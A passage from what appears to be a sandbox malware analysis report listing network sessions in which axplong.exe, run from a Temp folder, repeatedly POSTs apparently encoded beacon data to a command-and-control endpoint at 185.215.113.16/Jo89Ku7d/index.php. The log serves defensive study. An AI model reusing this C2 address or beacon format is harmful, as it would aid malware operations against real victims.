                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    45192.168.2.453698185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:53.943285942 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:54.735652924 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:54 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:54.736474037 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:54.965523005 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:54 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    46192.168.2.453699185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:55.084219933 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:55.824083090 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:55 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:55.825264931 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:56.053215027 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:55 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    47192.168.2.453700185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:56.179466963 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:56.891860962 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:56 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:56.897488117 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:57.123625994 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:57 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    48192.168.2.453701185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:57.240823984 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:57.962990046 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:57 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:57.968017101 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:58.198936939 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:58 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    49192.168.2.453702185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:58.319080114 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:59.045985937 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:58 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:59.050137997 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:59.285262108 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:59 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    50192.168.2.453703185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:59.745620966 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:42:00.140475988 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:42:00 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:42:00.141350031 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:42:00.367666006 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:42:00 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    51192.168.2.453704185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:42:00.474468946 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:42:01.174871922 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:42:01 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:42:01.175734997 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:42:01.396397114 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:42:01 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    52192.168.2.453705185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:42:01.505740881 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:42:02.221412897 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:42:02 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:42:02.245461941 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:42:02.478046894 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:42:02 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    53192.168.2.453706185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:42:02.599476099 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:42:02.905877113 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:42:03.702111006 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:42:03 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    54192.168.2.453707185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:42:03.716547012 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:42:04.431354046 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:42:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    55192.168.2.453708185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:42:04.557512045 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:42:05.254632950 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:42:05 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    56192.168.2.453709185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:42:05.264228106 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:42:05.987082958 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:42:05 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    57192.168.2.453710185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:42:06.104980946 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:42:06.805308104 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:42:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    58192.168.2.453711185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:42:06.814843893 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:42:07.518167019 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:42:07 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    59192.168.2.453712185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:42:07.809724092 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:42:08.501472950 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:42:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    60192.168.2.453713185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:42:08.619116068 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
